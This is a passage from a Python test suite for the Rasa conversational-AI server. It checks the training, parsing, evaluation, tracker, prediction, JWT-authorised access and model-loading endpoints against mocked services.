headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# For unknown reasons this test cannot be run in PyCharm: it results in
# segfaults, so we skip it in that case - the test still runs on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return (
requests.get("http://localhost:5005/status").status_code
== HTTPStatus.OK
)
except Exception:
return False
# wait until server is up before sending train request and status test loop
start = time.time()
while not is_server_ready() and time.time() - start < 60:
time.sleep(1)
assert is_server_ready()
training_request.start()
# Wait until the blocking training function was called
start = time.time()
while (
shared_statuses.get("started_training") is not True and time.time() - start < 60
):
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
start = time.time()
while shared_statuses.get("training_result") is None and time.time() - start < 60:
time.sleep(1)
assert shared_statuses.get("training_result")
# Check that the training worked correctly
assert shared_statuses["training_result"] == HTTPStatus.OK
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
async def test_parse(rasa_app: SanicASGITestClient, response_test: ResponseTest):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
rjs = response.json
assert response.status == HTTPStatus.OK
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
async def test_parse_with_different_emulation_mode(
rasa_app: SanicASGITestClient, response_test: ResponseTest
):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
assert response.status == HTTPStatus.OK
async def test_parse_without_nlu_model(rasa_app_core: SanicASGITestClient):
_, response = await rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == HTTPStatus.OK
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
async def test_parse_on_invalid_emulation_mode(rasa_app: SanicASGITestClient,):
_, response = await rasa_app.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_nlu_success(
rasa_app: SanicASGITestClient,
stack_config_path: Text,
nlu_data_path: Text,
domain_path: Text,
tmp_path_factory: TempPathFactory,
):
domain_data = rasa.shared.utils.io.read_yaml_file(domain_path)
config_data = rasa.shared.utils.io.read_yaml_file(stack_config_path)
nlu_data = rasa.shared.utils.io.read_yaml_file(nlu_data_path)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa.shared.utils.io.write_yaml(payload, data)
_, response = await rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(Path(tmp_path_factory.mktemp("model_dir")) / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
storage_path = tmp_path_factory.mktemp("storage_path")
model_storage, model_metadata = LocalModelStorage.from_model_archive(
storage_path, model_path
)
assert model_metadata.model_id
async def test_train_core_success_with(
rasa_app: SanicASGITestClient,
stack_config_path: Text,
stories_path: Text,
domain_path: Text,
tmp_path_factory: TempPathFactory,
):
payload = f"""
{Path(domain_path).read_text()}
{Path(stack_config_path).read_text()}
{Path(stories_path).read_text()}
"""
_, response = await rasa_app.post(
"/model/train",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(Path(tmp_path_factory.mktemp("model_dir")) / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
storage_path = tmp_path_factory.mktemp("storage_path")
model_storage, model_metadata = LocalModelStorage.from_model_archive(
storage_path, model_path
)
assert model_metadata.model_id
async def test_train_with_retrieval_events_success(
rasa_app: SanicASGITestClient,
stack_config_path: Text,
tmp_path_factory: TempPathFactory,
):
payload = {}
tmp_path = tmp_path_factory.mktemp("tmp")
for file in [
"data/test_domains/default_retrieval_intents.yml",
stack_config_path,
"data/test_yaml_stories/stories_retrieval_intents.yml",
"data/test_responses/default.yml",
"data/test/stories_default_retrieval_intents.yml",
]:
# Read in as dictionaries to avoid that keys, which are specified in
# multiple files (such as 'version'), clash.
content = rasa.shared.utils.io.read_yaml_file(file)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
# it usually takes a bit longer on windows so we're going to double the timeout
timeout = 60 * 10 if sys.platform == "win32" else 60 * 5
_, response = await rasa_app.post(
"/model/train",
data=payload_as_yaml,
timeout=timeout,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path_factory)
def assert_trained_model(
response_body: bytes, tmp_path_factory: TempPathFactory,
) -> None:
# save model to temporary file
model_path = str(Path(tmp_path_factory.mktemp("model_dir")) / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
storage_path = tmp_path_factory.mktemp("storage_path")
model_storage, model_metadata = LocalModelStorage.from_model_archive(
storage_path, model_path
)
assert model_metadata.model_id
async def test_train_with_yaml(
rasa_app: SanicASGITestClient, tmp_path_factory: TempPathFactory,
):
training_data = """
version: "2.0"
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- rule: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
recipe: default.v1
language: en
policies:
- name: RulePolicy
pipeline:
- name: KeywordIntentClassifier
"""
_, response = await rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path_factory)
@pytest.mark.parametrize(
"params", [{}, {"augmentation": 20, "num_threads": 2, "force_training": True}]
)
async def test_train_with_yaml_with_params(
monkeypatch: MonkeyPatch,
rasa_non_trained_app: SanicASGITestClient,
tmp_path: Path,
params: Dict,
):
fake_model = Path(tmp_path) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
mock_train = Mock(return_value=TrainingResult(model=fake_model_path))
monkeypatch.setattr(rasa.model_training, "train", mock_train)
training_data = """
stories: []
rules: []
intents: []
nlu: []
responses: {}
recipe: default.v1
language: en
policies: []
pipeline: []
"""
_, response = await rasa_non_trained_app.post(
"/model/train",
data=training_data,
params=params,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert mock_train.call_count == 1
args, kwargs = mock_train.call_args_list[0]
assert kwargs["core_additional_arguments"]["augmentation_factor"] == params.get(
"augmentation", 50
)
assert kwargs["nlu_additional_arguments"]["num_threads"] == params.get(
"num_threads", 1
)
assert kwargs["force_training"] == params.get("force_training", False)
async def test_train_with_invalid_yaml(rasa_non_trained_app: SanicASGITestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = await rasa_non_trained_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(
headers: Dict, expected: bool, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.shared.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
(
{"save_to_default_model_directory": True},
rasa.shared.constants.DEFAULT_MODELS_PATH,
),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("output")
assert payload.get("output") == expected
async def xtest_evaluate_stories(rasa_app: SanicASGITestClient, stories_path: Text):
stories = rasa.shared.utils.io.read_file(stories_path)
_, response = await rasa_app.post(
"/model/test/stories",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
async def test_evaluate_stories_not_ready_agent(
rasa_non_trained_app: SanicASGITestClient, stories_path: Text
):
stories = rasa.shared.utils.io.read_file(stories_path)
_, response = await rasa_non_trained_app.post("/model/test/stories", data=stories)
assert response.status == HTTPStatus.CONFLICT
async def test_evaluate_stories_end_to_end(
rasa_app: SanicASGITestClient, end_to_end_story_path: Text
):
stories = rasa.shared.utils.io.read_file(end_to_end_story_path)
_, response = await rasa_app.post(
"/model/test/stories?e2e=true",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert js["actions"] != []
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
async def test_evaluate_intent(rasa_app: SanicASGITestClient, nlu_data_path: Text):
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
_, response = await rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_invalid_intent_model_file(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents?model=invalid.tar.gz",
json={},
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_evaluate_intent_without_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents", headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicASGITestClient, nlu_data_path: Text
):
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_intent_with_model_param(
rasa_app: SanicASGITestClient, trained_nlu_model: Text, nlu_data_path: Text
):
_, response = await rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
_, response = await rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = await rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
async def test_evaluate_intent_with_model_server(
rasa_app: SanicASGITestClient,
trained_rasa_model: Text,
nlu_data_path: Text,
tear_down_scheduler: None,
):
production_model_server_url = (
"https://example.com/webhooks/actions?model=production"
)
test_model_server_url = "https://example.com/webhooks/actions?model=test"
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
with aioresponses() as mocked:
# Mock retrieving the production model from the model server
mocked.get(
production_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "production", "filename": "prod_model.tar.gz"},
)
# Mock retrieving the test model from the model server
mocked.get(
test_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "test", "filename": "test_model.tar.gz"},
)
agent_with_model_server = await load_agent(
model_server=EndpointConfig(production_model_server_url)
)
rasa_app.sanic_app.agent = agent_with_model_server
_, response = await rasa_app.post(
f"/model/test/intents?model={test_model_server_url}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
production_model_server = rasa_app.sanic_app.agent.model_server
# Assert that the model server URL for the test didn't override the production
# model server URL
assert production_model_server.url == production_model_server_url
# Assert the tests didn't break pulling the models
assert production_model_server.kwargs.get("wait_time_between_pulls") != 0
async def test_cross_validation(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.OK
response_body = response.json
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
async def test_cross_validation_with_callback_success(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
monkeypatch: MonkeyPatch,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
mocked_cross_validation = AsyncMock(
return_value=(
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
)
)
monkeypatch.setattr(
rasa.nlu.test,
rasa.nlu.test.cross_validate.__name__,
mocked_cross_validation,
)
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
# Sleep to give event loop time to process things in the background
await asyncio.sleep(1)
mocked_cross_validation.assert_called_once()
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["data"]
response_body = json.loads(content)
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
async def test_cross_validation_with_callback_error(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
monkeypatch: MonkeyPatch,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
monkeypatch.setattr(
rasa.nlu.test,
rasa.nlu.test.cross_validate.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_callback_unexpected_error(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
monkeypatch: MonkeyPatch,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
async def raiseUnexpectedError() -> NoReturn:
raise ValueError()
monkeypatch.setattr(
rasa.server,
rasa.server._training_payload_from_yaml.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_predict(rasa_app: SanicASGITestClient):
data = [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == HTTPStatus.OK
assert "scores" in content
assert "tracker" in content
assert "policy" in content
async def test_predict_invalid_entities_format(rasa_app: SanicASGITestClient):
data = [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": {},
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_predict_empty_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/predict", headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_append_events_empty_request_body(rasa_app: SanicASGITestClient,):
_, response = await rasa_app.post(
"/conversations/testid/tracker/events",
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_replace_events_empty_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.put(
"/conversations/testid/tracker/events",
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@freeze_time("2018-01-01")
async def test_requesting_non_existent_tracker(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
_, response = await rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == HTTPStatus.OK
assert content["paused"] is False
assert content["slots"] == {
"name": None,
REQUESTED_SLOT: None,
SESSION_START_METADATA_SLOT: None,
}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": 1,
"timestamp": 1514764800,
"action_text": None,
"hide_rule_turn": False,
"metadata": {"model_id": model_id},
},
{
"event": "session_started",
"timestamp": 1514764800,
"metadata": {"model_id": model_id},
},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
"action_text": None,
"hide_rule_turn": False,
"metadata": {"model_id": model_id},
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
async def test_pushing_event(rasa_app: SanicASGITestClient, event: Event):
model_id = rasa_app.sanic_app.agent.model_id
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
# Wait a bit so that the server-generated timestamp is strictly greater
# than time_before_adding_events
time.sleep(0.01)
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 4
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
assert deserialized_events[:3] == with_model_ids(session_start_sequence, model_id)
assert deserialized_events[3] == with_model_id(event, model_id)
assert deserialized_events[3].timestamp > time_before_adding_events
async def test_pushing_event_with_existing_model_id(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
existing_model_id = "some_old_id"
assert existing_model_id != model_id
event = with_model_id(BotUttered("hello!"), existing_model_id)
serialized_event = event.as_dict()
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
received_event = deserialized_events[3]
assert received_event == with_model_id(event, existing_model_id)
async def test_push_multiple_events(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json
assert tracker is not None
# there is an initial session start sequence at the beginning
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == with_model_ids(session_start_sequence + test_events, model_id)
@pytest.mark.parametrize(
"params", ["?execute_side_effects=true&output_channel=callback", ""]
)
async def test_pushing_event_while_executing_side_effects(
rasa_server: Sanic, params: Text
):
input_channel = CallbackInput(EndpointConfig("https://example.com/callback"))
channel.register([input_channel], rasa_server, "/webhooks/")
rasa_app = rasa_server.asgi_client
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = test_events[1].as_dict()
with aioresponses() as mocked:
mocked.post(
"https://example.com/callback",
repeat=True,
headers={"Content-Type": "application/json"},
)
await rasa_app.post(
f"{conversation}/tracker/events{params}",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
r = latest_request(mocked, "post", "https://example.com/callback")
if not params:
assert r is None
else:
message_received = json_of_latest_request(r)
assert message_received.get("recipient_id") == sender_id
assert message_received.get("text") == serialized_event.get("text")
async def test_post_conversation_id_with_slash(rasa_app: SanicASGITestClient):
model_id = rasa_app.sanic_app.agent.model_id
conversation_id = str(uuid.uuid1())
id_len = len(conversation_id) // 2
conversation_id = conversation_id[:id_len] + "/+-_\\=" + conversation_id[id_len:]
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json
assert tracker is not None
# there is a session start sequence at the start
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == with_model_ids(session_start_sequence + test_events, model_id)
async def test_put_tracker(rasa_app: SanicASGITestClient):
data = [event.as_dict() for event in test_events]
_, response = await rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == HTTPStatus.OK
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = await rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
async def test_predict_without_conversation_id(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post("/conversations/non_existent_id/predict")
assert response.status == HTTPStatus.NOT_FOUND
assert response.json["message"] == "Conversation ID not found."
async def test_sorted_predict(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = await rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
async def _create_tracker_for_sender(app: SanicASGITestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = await app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
async def test_get_tracker_with_jwt(rasa_secured_app: SanicASGITestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.FORBIDDEN
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
def test_list_routes(empty_agent: Agent):
app = rasa.server.create_app(empty_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
async def test_unload_model_error(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = await rasa_app.delete("/model")
assert response.status == HTTPStatus.NO_CONTENT
async def test_get_domain(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json
assert response.status == HTTPStatus.OK
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
async def test_get_domain_invalid_accept_header(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/domain")
assert response.status == HTTPStatus.NOT_ACCEPTABLE
async def test_load_model(rasa_app: SanicASGITestClient, trained_core_model: Text):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
async def test_load_model_from_model_server(
rasa_app: SanicASGITestClient, trained_core_model: Text, tear_down_scheduler: None
):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
